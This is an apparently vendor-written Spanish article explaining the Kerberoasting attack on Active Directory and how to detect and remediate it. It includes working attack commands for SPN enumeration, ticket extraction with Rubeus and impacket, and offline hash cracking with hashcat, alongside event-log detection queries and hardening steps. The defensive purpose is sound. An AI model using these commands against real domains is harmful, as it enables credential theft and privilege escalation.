Que es el Kerberoasting?
El Kerberoasting es una tecnica de ataque de Active Directory que permite a cualquier usuario autenticado del dominio extraer hashes de contrasenas crackeables de cuentas de servicio, sin ningun privilegio especial.
El ataque apunta a cuentas con un Service Principal Name (SPN) configurado. En Kerberos, cualquier usuario del dominio puede solicitar un ticket de servicio (TGS) para cualquier SPN. Ese ticket esta cifrado con el hash NTLM de la cuenta de servicio. Un atacante puede solicitar el ticket y crackearlo sin conexion.
Sin derechos elevados. Sin interaccion con la cuenta objetivo. Sin alertas en el sistema objetivo.
⚠️ Por que es grave: Las cuentas de servicio suelen tener contrasenas que nunca expiran, configuradas hace anos, sin los mismos requisitos de complejidad que las cuentas de usuario.
Como Funciona
Cuando un usuario quiere acceder a un servicio, Kerberos emite un ticket TGS cifrado con el hash NTLM de la cuenta que ejecuta ese servicio. El KDC no verifica si el usuario solicitante necesita realmente acceso: simplemente emite el ticket.
Cualquier usuario del dominio puede recopilar tantos tickets de servicio como desee, para cualquier SPN, sin ningun control de autorizacion.
La Cadena de Ataque
Paso 1 - Enumerar los SPNs
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, PasswordLastSet, PasswordNeverExpires |
Select-Object SamAccountName, ServicePrincipalName, PasswordLastSet, PasswordNeverExpires
impacket-GetUserSPNs -dc-ip 10.10.0.1 corp.local/user:password
Objetivos interesantes: cuentas con PasswordNeverExpires = True, fechas PasswordLastSet antiguas, nombres legibles como svc_sql, svc_backup.
Paso 2 - Solicitar los Tickets de Servicio
.\Rubeus.exe kerberoast /outfile:hashes.txt
impacket-GetUserSPNs -dc-ip 10.10.0.1 corp.local/user:password -request -outputfile hashes.txt
Paso 3 - Crackear sin Conexion
# Modo 13100 para RC4
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file best64.rule
# Modo 19700 para AES-256
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt
Paso 4 - Movimiento Lateral y Escalada de Privilegios
Una contrasena de cuenta de servicio crackeada abre el acceso a todo lo que esa cuenta tiene disponible. Si la cuenta tiene demasiados privilegios, puede significar un camino directo hacia Domain Admin.
Deteccion
Event IDs de Windows
| Event ID | Fuente | Que buscar |
|---|---|---|
| 4769 | DC - Security | TGS solicitado con cifrado RC4 (0x17) cuando AES es el estandar |
| 4769 | DC - Security | Multiples solicitudes TGS para diferentes SPNs en poco tiempo desde una cuenta |
Consulta SIEM (Elastic KQL)
event.code: "4769" AND
winlog.event_data.TicketEncryptionType: "0x17" AND
NOT winlog.event_data.ServiceName: ("krbtgt" OR "*$")
💡 Consejo: Aplique AES exclusivo en su dominio. Cualquier solicitud RC4 se convierte en una alerta de alta confianza.
Remediacion
💡 Accion Rapida: Audite las cuentas de servicio con
PasswordNeverExpires = Truey rote cualquier contrasena de mas de un ano.
-
Contrasenas largas y fuertes - minimo 25 caracteres generados aleatoriamente.
-
Group Managed Service Accounts (gMSA) - contrasenas de 240 caracteres gestionadas automaticamente por AD.
New-ADServiceAccount -Name gMSA_SQL -DNSHostName sql.corp.local -PrincipalsAllowedToRetrieveManagedPassword "SQL_Servers"
Install-ADServiceAccount -Identity gMSA_SQL
- Aplicar AES en las cuentas de servicio.
Set-ADUser -Identity svc_sql -Replace @{msDS-SupportedEncryptionTypes=24}
- Minimo privilegio - las cuentas de servicio solo deben tener los permisos necesarios.
Como EtcSec Detecta Esto
EtcSec identifica las condiciones que hacen posible el Kerberoasting antes de que un atacante las explote.
La deteccion KERBEROASTING_RISK senala todas las cuentas con SPN configurado que son vulnerables debido a una postura de contrasena debil.
Controles relacionados:
- PASSWORD_NEVER_EXPIRES - contrasenas que nunca expiran permanecen crackeables indefinidamente
- PASSWORD_POLICY_WEAK - politica debil hace el cracking mas probable
- KERBEROS_RC4_FALLBACK - RC4 aun permitido acelera el cracking considerablemente
ℹ️ Nota: EtcSec verifica automaticamente estas vulnerabilidades en cada auditoria AD. Ejecute una auditoria gratuita para ver que cuentas de servicio estan expuestas.
